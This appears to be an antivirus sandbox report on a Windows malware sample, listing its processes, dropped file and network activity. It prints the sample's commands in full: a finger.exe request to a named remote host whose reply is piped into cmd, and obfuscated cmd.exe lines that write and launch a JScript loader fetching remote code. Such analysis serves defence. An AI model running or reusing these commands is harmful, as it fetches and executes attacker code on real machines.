Technical Information
Malicious functions
Creates and executes the following
- '<SYSTEM32>\finger.exe' ok@2irgariavk.motivacao.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\L5r.js"
Modifies file system
Creates the following files
- C:\users\public\l5r.js
Network activity
Connects to
- '2i######vk.motivacao.xyz':79
- 'ww######aka.tampatampa.xyz':80
TCP
- '2i######vk.motivacao.xyz':79
UDP
- DNS ASK 2i######vk.motivacao.xyz
- DNS ASK ww######aka.tampatampa.xyz
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@2irgariavk.motivacao.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set HWRY=.j&&sET YMDTW=veDCNareDCN a =eDCN 'sceDCNrieDCNpteDCN:'; b =eDCN 'heDCNTtPeDCN:'; GeDCNeteDCNObjeDCNeceDCNt(eDCNa+b+'&&sET 0BI5=DIXHHDIXHHww9re43aaka.tampatampa.xyzDIXHH?1DIXHH...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p LTOM2="%YMDTW:eDCN=%%0BI5:DIXHH=/%" 0<nul 1>C:\Users\Public\L5r%HWRY%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\L5r%HWRY%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\L5r.js
